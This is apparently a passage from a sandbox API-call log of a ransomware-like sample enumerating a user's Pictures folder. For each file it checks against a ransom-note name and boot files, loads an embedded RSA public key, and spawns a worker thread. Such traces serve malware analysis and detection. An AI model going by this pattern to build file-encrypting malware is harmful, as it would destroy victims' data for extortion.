[0121.452] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.452] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.452] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.452] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.452] lstrcpyW (in: lpString1=0x17cf1c, lpString2="aqn8.gif" | out: lpString1="aqn8.gif") returned="aqn8.gif" [0121.452] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5ac [0121.453] Sleep (dwMilliseconds=0x96) [0121.623] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.623] lstrcmpW (lpString1="azuNey.jpg", lpString2="..") returned 1 [0121.623] lstrcmpW (lpString1="azuNey.jpg", lpString2=".") returned 1 [0121.623] StrStrW (lpFirst="azuNey.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.623] StrStrW (lpFirst="azuNey.jpg", lpSrch="ntldr") returned 0x0 [0121.623] StrStrW (lpFirst="azuNey.jpg", lpSrch="NTLDR") returned 0x0 [0121.623] StrStrW (lpFirst="azuNey.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0121.623] StrStrW (lpFirst="azuNey.jpg", lpSrch="ntdetect.com") returned 0x0 [0121.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.623] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.623] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.623] lstrcpyW (in: lpString1=0x17cf1c, lpString2="azuNey.jpg" | out: lpString1="azuNey.jpg") returned="azuNey.jpg" [0121.624] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b4 [0121.624] Sleep (dwMilliseconds=0x96) [0121.779] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.779] lstrcmpW (lpString1="B4vC-SYblpXq.bmp", lpString2="..") returned 1 [0121.779] lstrcmpW (lpString1="B4vC-SYblpXq.bmp", lpString2=".") returned 1 [0121.779] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.779] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="ntldr") returned 0x0 [0121.779] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="NTLDR") returned 0x0 [0121.779] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0121.779] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="ntdetect.com") returned 0x0 [0121.779] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.779] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.779] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.779] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.779] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B4vC-SYblpXq.bmp" | out: lpString1="B4vC-SYblpXq.bmp") returned="B4vC-SYblpXq.bmp" [0121.779] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0121.780] Sleep (dwMilliseconds=0x96) [0121.999] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.999] lstrcmpW (lpString1="bqBGtF.bmp", lpString2="..") returned 1 [0121.999] lstrcmpW (lpString1="bqBGtF.bmp", lpString2=".") returned 1 [0121.999] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.999] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="ntldr") returned 0x0 [0121.999] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="NTLDR") returned 0x0 [0121.999] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0121.999] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="ntdetect.com") returned 0x0 [0121.999] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.999] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.999] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.999] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.999] lstrcpyW (in: lpString1=0x17cf1c, lpString2="bqBGtF.bmp" | out: lpString1="bqBGtF.bmp") returned="bqBGtF.bmp" [0121.999] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5bc [0122.000] Sleep (dwMilliseconds=0x96) [0122.158] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0122.158] lstrcmpW (lpString1="bz3TQY.png", lpString2="..") returned 1 [0122.158] lstrcmpW (lpString1="bz3TQY.png", lpString2=".") returned 1 [0122.158] StrStrW (lpFirst="bz3TQY.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0122.158] StrStrW (lpFirst="bz3TQY.png", lpSrch="ntldr") returned 0x0 [0122.158] StrStrW (lpFirst="bz3TQY.png", lpSrch="NTLDR") returned 0x0 [0122.158] StrStrW (lpFirst="bz3TQY.png", lpSrch="NTDETECT.COM") returned 0x0 [0122.158] StrStrW (lpFirst="bz3TQY.png", lpSrch="ntdetect.com") returned 0x0 [0122.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0122.158] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0122.158] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0122.158] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.158] lstrcpyW (in: lpString1=0x17cf1c, lpString2="bz3TQY.png" | out: lpString1="bz3TQY.png") returned="bz3TQY.png" [0122.158] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b8 [0122.159] Sleep (dwMilliseconds=0x96) [0122.325] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0122.325] lstrcmpW (lpString1="dcuecnaq5mY4vS.jpg", lpString2="..") returned 1 [0122.325] lstrcmpW (lpString1="dcuecnaq5mY4vS.jpg", lpString2=".") returned 1 [0122.325] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0122.325] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="ntldr") returned 0x0 [0122.325] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="NTLDR") returned 0x0 [0122.325] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0122.325] StrStrW (lpFirst="dcuecnaq5mY4vS.jpg", lpSrch="ntdetect.com") returned 0x0 [0122.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0122.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0122.325] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0122.325] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.325] lstrcpyW (in: lpString1=0x17cf1c, lpString2="dcuecnaq5mY4vS.jpg" | out: lpString1="dcuecnaq5mY4vS.jpg") returned="dcuecnaq5mY4vS.jpg" [0122.326] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c8 [0122.326] Sleep (dwMilliseconds=0x96) [0122.559] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0122.559] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0122.559] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0122.559] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0122.559] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0122.559] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0122.559] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0122.559] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0122.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0122.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0122.559] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0122.559] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.559] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0122.559] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b0 [0122.560] Sleep (dwMilliseconds=0x96) [0122.840] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0122.840] lstrcmpW (lpString1="diyvOkO.gif", lpString2="..") returned 1 [0122.840] lstrcmpW (lpString1="diyvOkO.gif", lpString2=".") returned 1 [0122.840] StrStrW (lpFirst="diyvOkO.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0122.840] StrStrW (lpFirst="diyvOkO.gif", lpSrch="ntldr") returned 0x0 [0122.840] StrStrW (lpFirst="diyvOkO.gif", lpSrch="NTLDR") returned 0x0 [0122.840] StrStrW (lpFirst="diyvOkO.gif", lpSrch="NTDETECT.COM") returned 0x0 [0122.840] StrStrW (lpFirst="diyvOkO.gif", lpSrch="ntdetect.com") returned 0x0 [0122.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0122.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0122.840] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0122.840] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.840] lstrcpyW (in: lpString1=0x17cf1c, lpString2="diyvOkO.gif" | out: lpString1="diyvOkO.gif") returned="diyvOkO.gif" [0122.840] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.840] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5d4 [0122.840] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) returned 0x0 [0123.317] Sleep (dwMilliseconds=0x96) [0123.464] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0123.464] lstrcmpW (lpString1="d_ywXujVU Wq1E.jpg", lpString2="..") returned 1 [0123.464] lstrcmpW (lpString1="d_ywXujVU Wq1E.jpg", lpString2=".") returned 1 [0123.464] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0123.464] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="ntldr") returned 0x0 [0123.464] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="NTLDR") returned 0x0 [0123.464] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0123.464] StrStrW (lpFirst="d_ywXujVU Wq1E.jpg", lpSrch="ntdetect.com") returned 0x0 [0123.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0123.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0123.464] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0123.464] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 